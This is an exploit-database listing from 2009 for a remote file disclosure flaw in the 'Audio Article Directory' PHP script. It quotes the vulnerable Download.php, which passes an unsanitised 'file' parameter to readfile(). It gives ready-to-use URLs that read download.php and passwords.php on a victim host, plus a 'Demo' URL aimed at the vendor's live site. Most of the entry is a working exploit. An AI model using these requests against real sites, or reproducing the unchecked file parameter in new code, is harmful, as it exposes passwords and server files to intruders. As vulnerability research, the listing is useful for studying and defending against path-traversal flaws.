Lucene search

K
exploitdbThE g0bL!NEDB-ID:9041
HistoryJun 29, 2009 - 12:00 a.m.

Audio Article Directory - 'file' Remote File Disclosure

2009-06-2900:00:00
ThE g0bL!N
www.exploit-db.com
29

AI Score

7.4

Confidence

Low

#################################################################################################################
[+] Audio Article Directory Remote File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
Vendor:http://audioarticledirectory.com
#################################################################################################################
Poc
---
Download.php
<?
$file = "./".$_GET['file']; => one
 header('Content-Description: File Transfer');
           header('Content-Type: application/force-download');
           header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
           header('Content-Length: ' . filesize($file));
@readfile($file) OR die(); => 2
?>
Exploit
----
http://victim/download.php?file=download.php
http://victim/download.php?file=./passwords.php
Demo
----
http://audioarticledirectory.com/demo/download.php?file=./passwords.php
################################################################################################################

# milw0rm.com [2009-06-29]

AI Score

7.4

Confidence

Low

Related for EDB-ID:9041